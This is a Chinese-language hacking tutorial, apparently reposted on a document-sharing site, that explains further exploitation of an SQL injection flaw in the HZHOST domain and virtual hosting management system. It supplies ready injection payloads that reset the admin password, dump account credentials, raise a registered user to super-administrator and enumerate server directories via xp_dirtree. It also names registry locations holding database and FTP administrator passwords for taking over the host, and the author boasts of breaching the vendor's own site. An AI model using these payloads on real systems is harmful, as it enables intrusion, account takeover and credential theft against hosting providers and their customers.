




版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、HZHOST域名虚拟主机管理系统 sql 注射漏洞进一步利用12020 年 4 月 19 日资料内容仅供参考,如有不当或者侵权,请联系本人改正或者删除。这是一个域名主机实时管理系统。在百度搜索: title: ( 域名主机实时管理系统) ,会找到大量采用这种系统的网站! 太术语了。就是在线开通ftp.sql.web的一个管理系统。一套web 程序。和IIS管理程序。实现在线开通的玩意。因此 : 我们能够免费申请域名和空间 ! ! 哈哈 ! ! !web 程序方面写的非常严谨。大量的过滤。由于是商业版的程序,因此我没有源码。原来是有的 , 可是放在家里的电脑上。放暑假时搞的 shell 现在都被
2、删了。我现在又比较懒 , 就没去弄源代码。反正大家知道怎么弄的就行了。这又是一个文本框的注射。我真不知道作者是怎么想的。其它地方都被过滤了。就留下域名管理这里没过滤。22020 年 4 月 19 日资料内容仅供参考,如有不当或者侵权,请联系本人改正或者删除。32020 年 4 月 19 日资料内容仅供参考,如有不当或者侵权,请联系本人改正或者删除。官方放暑假的时候就被我搞了一遍, 过了一个月她发现了。删了我的 shell。不知道她怎么知道我从那里下的手搞的她。她居然补了漏洞。先上图 , 再说下利用方法。123 UPDATE memlst SETu_pss=e10adc3949ba59abbe5
3、6e057f20f883e WHERE u_nme=admin-这一句是把用户 admin 的密码修改为 123456。管理员的后台地址一般是或者直接在首页登陆了按切换到管理员后台。如果 admin 不是超级管理员, 那就有三个办法。42020 年 4 月 19 日资料内容仅供参考,如有不当或者侵权,请联系本人改正或者删除。一是自己构造语句爆出来。二是提升自己注册的用户的权限。三是直接爆网站路径, 再来个差异备份。第一个方法我给出一条示范语句:123 and (select top 1 isnull(cast(u_nme as nvarchar(4000),char(32)+char(94)+
4、isnull(cast(U_pss as nvarchar(4000),char(32) from (select top 2u_nme,U_pss from hzhost.memlst where 1=1 order by u_nme) t order by u_nme desc )0- and 1=1能够同时爆出一个用户的帐号和密码。想爆出其它用户的语句自己构造吧。第二个方法是 :123 UPDATE memlst SET u_sys=6 WHERE u_nme=你注册的用户名 -123 UPDATE memlst SET u_pwr=2 WHERE u_nme=你注册的用户名 -这 2
5、句话就能够提升自己为超级管理员第三个方法很麻烦。可是很有效果。直捣黄龙。很强大。我给出如下语句 , 大家自己研究去吧!52020 年 4 月 19 日资料内容仅供参考,如有不当或者侵权,请联系本人改正或者删除。爆路径语句第一步 : 建立表 123 ;drop table foofoofoo;create tablefoofoofoo(id int identity (1,1) not null,name nvarchar (300) not null,depth int not null,isfile nvarchar (50) null);- and 1=1第二步 : 123 ;declar
6、e z nvarchar(4000) setz=0x63003a005c00 insert foofoofoo execute master.xp_dirtree z,1,1- and 1=1注意 : 0x63003a005c00 = C: 为 sql ENCODE其它的自己找工具去转吧!第三步 : 暴出总数 123 and (select cast(count(*) asvarchar(8000)+char(94) from foofoofoo)0- and 1=1第四步 : 暴出你想要的文件夹名字和文件名字123 and0(select top 1 cast(isfile asnvarch
7、ar(4000)+char(94)+cast(name as nvarchar(4000) from(select distinct top 1 * from foofoofoo order by isfile,name) torder by isfile desc,name desc)- and 1=1修改中间红色的1, 依次爆出。至于差异备份语句。让nbsi3 告诉你吧。对 HZHOST域名虚拟主机管理系统sql 注射漏洞进一步利用!62020 年 4 月 19 日资料内容仅供参考,如有不当或者侵权,请联系本人改正或者删除。我记得还有 2 篇关于 hzhost 的漏洞利用文章。名字不记得了
8、。大家去搜索 ”hzhost漏洞 ”找找吧 ! 里面提到下面两点内容 !1。是提到c:windowstemp 下有 hzhost 主机留下的ftp 登陆记录。有用户名和密码2。是利用hzhost 拿系统主机最高权限的。安装了 hzhost 的主机 ,其 mssql sa 密码 ,mysql root 密码还有serv-u的 administrator 密码全部保存在注册表中。位置在HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmysqlpassHKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmastersvrpass经过了 hzhost 自己的加密方式, 象eLVClO4tzsKBf#dee52443a3872cc159这样的字符串。不过在 hzhost 后台能够还原 ! 拿到了 sa 密码 , 或者 root 密码 , 最高
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
评论
0/150
提交评论